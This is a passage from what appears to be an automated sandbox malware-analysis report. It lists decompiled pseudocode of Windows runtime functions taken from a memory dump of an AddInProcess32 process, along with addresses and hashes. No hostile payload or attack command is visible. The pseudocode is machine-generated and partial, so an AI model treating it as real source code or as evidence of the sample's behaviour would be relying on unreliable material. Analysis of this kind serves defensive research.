						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01911608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01922B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0191C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0191DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01877D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0191A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0191fde7
0x0191fde8
0x0191fdec
0x0191fdee
0x0191fdf5
0x0191fdf7
0x0191fdfc
0x0191fe19
0x0191fe22
0x0191fe26
0x0191fec6
0x0191fecd
0x0191fed5
0x0191fee7
0x0191fed7
0x0191fee0
0x0191fee0
0x0191feef
0x0191ff00
0x0191ff02
0x0191ff07
0x0191ff07
0x00000000
0x0191feef
0x0191fe33
0x0191fe55
0x0191fe59
0x0191fe5b
0x0191fe5e
0x0191fe69
0x0191fe6d
0x0191fe6d
0x0191fe69
0x0191fe35
0x0191fe41
0x0191fe41
0x0191fe79
0x0191fe8b
0x0191fe7b
0x0191fe84
0x0191fe84
0x0191fe93
0x00000000
0x0191fea8
0x0191feba
0x00000000
0x0191feba
0x0191fdfe
0x0191fe01
0x0191fe02
0x0191fe08
0x0191ff0c
0x0191ff14
0x0191ff14

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 3843f7daf554163910e8c479623e163b9a053a5416780f126261ea0b9011ff3f
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 3431283220064C6FD722876CC848F6A7BAAEBC5750F084558E54E8B34ADA70EC85C750

Uniqueness

Uniqueness Score: -1.00%

Function 0191EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0191EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01872280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0191E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0185F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0186FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0191AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0191BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01877D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0190FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0186FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0191A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0191ea55
0x0191ea66
0x0191ea68
0x0191ea6c
0x0191ea6f
0x0191ea72
0x0191ea75
0x0191ea7a
0x0191ea7a
0x0191ea7e
0x0191ea80
0x0191ea85
0x0191ea8b
0x0191eab5
0x0191eabc
0x0191eabf
0x0191eabf
0x0191eaca
0x0191eace
0x0191ead0
0x0191eae4
0x0191eaeb
0x0191eaf0
0x0191eaf5
0x0191eb09
0x0191eb0d
0x0191eb1d
0x0191eb2d
0x0191eb38
0x0191eb3d
0x0191eb41
0x0191eb4a
0x0191eb60
0x0191eb4c
0x0191eb52
0x0191eb59
0x0191eb59
0x0191eb68
0x0191eb71
0x0191eb71
0x0191ea8d
0x0191ea8f
0x0191ea92
0x0191ea97
0x0191ea97
0x0191ea9b
0x0191ea9c
0x0191ea9e
0x0191eaa6
0x0191eaa6
0x0191eb7e

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 8ae8923820c5c5cba8673b3827df12280fa6f71336521f72c104e6654ed3627b
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: C531B47260470A9BC71ADF28C880A5BB7AAFFC4310F04492DF95A87785DE30E945C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 018D69A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E018D69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x194d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01866C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E018D6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01899980() >= 0) {
							E01872280(_t56, 0x1948778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1948774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1948774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0185B6F0(0x183c338, 0x183c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01899520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E018995D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0186FFB0(_t68, _t77, 0x1948778);
				}
				_pop(_t78);
				return E0189B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x018d69b5
0x018d69be
0x018d69c3
0x018d69c9
0x018d69cc
0x018d69d1
0x018d69d3
0x018d69de
0x018d69e1
0x018d69ea
0x018d69f6
0x018d69fe
0x018d6a13
0x018d6a14
0x018d6a15
0x018d6a16
0x018d6a1e
0x018d6a26
0x018d6a31
0x018d6a36
0x018d6a37
0x018d6a40
0x018d6a49
0x018d6a4a
0x018d6a53
0x018d6a59
0x018d6a5d
0x018d6a5e
0x018d6a64
0x018d6a67
0x018d6a6a
0x018d6a6d
0x018d6a70
0x018d6a77
0x018d6a7d
0x018d6a86
0x018d6a89
0x018d6a9c
0x018d6a9f
0x018d6aa2
0x018d6aa5
0x018d6aaf
0x018d6ab1
0x018d6ab8
0x018d6ab9
0x018d6abb
0x018d6abe
0x018d6ac5
0x018d6ac5
0x018d6aaf
0x018d6a40
0x018d6a26
0x018d69fe
0x018d6ace
0x018d6ad0
0x018d6ad3
0x018d6ad8
0x018d6adf
0x018d6adf
0x018d6ae8
0x018d6aef
0x018d6aef
0x018d6af9
0x018d6b06

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62da94347473a41523ab086ff7feac7cf9c577f79a72081c6ff329abb94dd061
Instruction ID: 42857088606c05e67f9f633958953994c7c47fe765df76f7726031158853a886
Opcode Fuzzy Hash: 62da94347473a41523ab086ff7feac7cf9c577f79a72081c6ff329abb94dd061
Instruction Fuzzy Hash: 78415CB5D003099FDB24DFAAD940BAEBBF8EF48714F14812AE954E7240EB749A05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01855210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01855210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E018552A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E018995D0();
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0186EB70(_t54, 0x19479a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E018995D0();
								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0186EB70(_t54, 0x19479a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0189F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0186EB70(_t54, 0x19479a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E018995D0();
							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x01855220
0x01855224
0x018b0d13
0x018b0d16
0x018b0d19
0x0185522a
0x0185522a
0x0185522d
0x0185522d
0x01855231
0x01855235
0x01855239
0x018b0d5c
0x018b0d62
0x00000000
0x00000000
0x018b0d6a
0x018b0d7b
0x018b0d7f
0x018b0d81
0x018b0d84
0x018b0d95
0x018b0d95
0x018b0d6c
0x018b0d71
0x018b0d71
0x018b0d9a
0x00000000
0x0185524a
0x0185524a
0x01855250
0x018b0d24
0x018b0d35
0x018b0d39
0x018b0d3b
0x018b0d3e
0x018b0d50
0x018b0d50
0x018b0d26
0x018b0d2b
0x018b0d2b
0x00000000
0x018b0d55
0x01855256
0x0185525b
0x01855265
0x018b0da7
0x0185526b
0x0185526e
0x01855272
0x018b0db1
0x018b0db4
0x018b0dc5
0x018b0dc5
0x01855272
0x01855278
0x0185527e
0x0185528a
0x0185528c
0x0185528d
0x00000000
0x01855280
0x01855282
0x01855288
0x0185529f
0x01855292
0x00000000
0x01855292
0x00000000
0x01855288
0x0185527e

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4682b9382d7ed1a302b9976a7017b2fcbe6b341d86aa7364f7ca85c6f38967f9
Instruction ID: 14f046c10718c15de863755abacc28d207d2c42ef6b4aef3b092462deacf688d
Opcode Fuzzy Hash: 4682b9382d7ed1a302b9976a7017b2fcbe6b341d86aa7364f7ca85c6f38967f9
Instruction Fuzzy Hash: 9C31F231641605ABCB269B1CC880BAB7BB5EF107A4F194719F959CB6E0EB60FB00C791

Uniqueness

Uniqueness Score: -1.00%

Function 01893D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01893D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01867B60(0, _t61, 0x18311c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01867B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01874620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01893d4c
0x01893d50
0x01893d55
0x01893d5e
0x018ce79a
0x00000000
0x018ce79a
0x01893d68
0x018ce789
0x01893d9d
0x01893da3
0x01893daf
0x01893db5
0x01893dbc
0x01893dc4
0x01893dc9
0x01893dce
0x018ce7ae
0x018ce7ae
0x01893dde
0x01893de2
0x01893de7
0x01893e0d
0x01893e13
0x01893e16
0x01893e1e
0x01893e25
0x01893e28
0x00000000
0x00000000
0x01893e2a
0x01893e2f
0x01893e37
0x01893e37
0x00000000
0x01893e37
0x01893e31
0x00000000
0x01893e31
0x01893e20
0x01893e20
0x01893e35
0x00000000
0x01893de9
0x01893de9
0x01893de9
0x01893dee
0x01893dfd
0x01893dff
0x01893e02
0x01893e05
0x01893e05
0x00000000
0x01893df0
0x01893de7
0x018ce78f
0x018ce794
0x01893d79
0x01893d84
0x01893d89
0x01893d8e
0x00000000
0x018ce7a4
0x01893d96
0x01893d9a
0x00000000
0x01893d9a
0x00000000
0x018ce794
0x01893d6e
0x01893d73
0x00000000
0x018ce7b5
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6783fd8d2e418e2c2d97c3aa403f8195f9e46738e2a21a3c1e0e61032dc14d9
Instruction ID: e615db68f0c7949daecbdfd2bcd84ae22bc56eb6bb8ecb393dbe6dd2fdf7976e
Opcode Fuzzy Hash: a6783fd8d2e418e2c2d97c3aa403f8195f9e46738e2a21a3c1e0e61032dc14d9
Instruction Fuzzy Hash: 3231AB31A05615DBDB258F3DC851A6ABBE5FF85B10B09806EE94ACB750E730DA40C791

Uniqueness

Uniqueness Score: -1.00%

Function 0188A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0188A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1930220);
				E018AD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1947b9c; // 0x0
				_t55 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E018AD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1947b10 =  *0x1947b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x194536c; // 0x77995368
					if( *_t51 != 0x1945368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1945368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x194536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0188A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0188a61c
0x0188a61e
0x0188a623
0x0188a628
0x0188a62b
0x0188a62d
0x0188a648
0x0188a64a
0x0188a64f
0x018c9b44
0x0188a6ec
0x0188a6f1
0x0188a6f1
0x0188a655
0x0188a657
0x0188a65a
0x0188a65d
0x0188a662
0x0188a663
0x0188a667
0x0188a668
0x0188a66d
0x0188a706
0x0188a706
0x018c9bda
0x018c9be6
0x018c9beb
0x00000000
0x018c9beb
0x0188a679
0x018c9b7a
0x00000000
0x018c9b7a
0x0188a683
0x0188a6f4
0x0188a6f7
0x0188a6f9
0x0188a6fd
0x0188a6a0
0x0188a6a0
0x0188a6ad
0x0188a6af
0x0188a6b4
0x018c9ba7
0x018c9bac
0x00000000
0x00000000
0x018c9bc6
0x018c9bce
0x018c9bd1
0x018c9bd3
0x018c9bd3
0x00000000
0x018c9bd1
0x0188a6bd
0x0188a6c3
0x0188a6c6
0x0188a6d2
0x0188a701
0x0188a704
0x00000000
0x0188a704
0x0188a6d4
0x0188a6d6
0x0188a6d9
0x0188a6db
0x0188a6e1
0x0188a6e6
0x0188a6e8
0x0188a6e8
0x0188a6ea
0x00000000
0x0188a6ea
0x0188a688
0x0188a692
0x0188a694
0x0188a699
0x00000000
0x00000000
0x0188a69d
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f717c091e637678f4b20b460c85951802c6010f9f1b164075dbc65ffe66dd456
Instruction ID: b55a074d86dea6350df1fe57bac05c33c395021bd296dd33e019f8df5afbacf9
Opcode Fuzzy Hash: f717c091e637678f4b20b460c85951802c6010f9f1b164075dbc65ffe66dd456
Instruction Fuzzy Hash: 70417C75A00219DFDB19EF58C480BA9BBF1FF89708F1580AAE905EB384C774EA01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0187C182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0187C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01877D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01928D34(_v8, _t80);
					}
					E01872280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0186FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01928833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0186FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0189B180();
						if(_a4 != 0) {
							E01872280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0187BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0187BB2D(_t16, _t15);
						E0187B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0186FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0186FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0186FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0187c18d
0x0187c18f
0x0187c191
0x0187c19b
0x0187c1a0
0x0187c1d4
0x0187c1de
0x018c2d6e
0x0187c1e4
0x0187c1e4
0x0187c1e4
0x0187c1ec
0x018c2d7d
0x018c2d7d
0x0187c1f3
0x0187c1ff
0x018c2d88
0x018c2d8d
0x018c2d94
0x018c2d94
0x018c2d9f
0x018c2da4
0x018c2dab
0x018c2db0
0x018c2db2
0x018c2db3
0x018c2db4
0x018c2dbc
0x018c2dc3
0x018c2dc3
0x0187c205
0x0187c205
0x0187c208
0x0187c20e
0x0187c211
0x0187c216
0x0187c219
0x0187c21f
0x0187c222
0x0187c22c
0x0187c234
0x0187c23a
0x0187c23f
0x0187c245
0x0187c24b
0x0187c251
0x0187c25a
0x0187c276
0x0187c27d
0x0187c27d
0x0187c25c
0x0187c25c
0x00000000
0x0187c25e
0x0187c1a4
0x0187c1aa
0x0187c1b3
0x0187c265
0x0187c26c
0x0187c26c
0x00000000

Memory Dump Source

